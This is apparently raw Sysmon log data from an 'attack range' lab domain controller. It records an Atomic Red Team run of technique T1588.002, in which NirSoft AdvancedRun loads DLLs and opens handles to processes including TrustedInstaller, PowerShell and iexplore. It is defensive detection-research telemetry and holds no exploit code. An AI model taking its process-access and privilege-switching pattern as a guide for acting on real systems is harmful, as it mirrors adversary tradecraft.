18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003988559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003988555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.724{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003988554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.724{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.A
utomation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003988553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.736{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" -hC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003984011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003984009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003984008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 534500x80000000000000003984007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003984006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003984005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003984003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003984002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003984001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003984000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.ex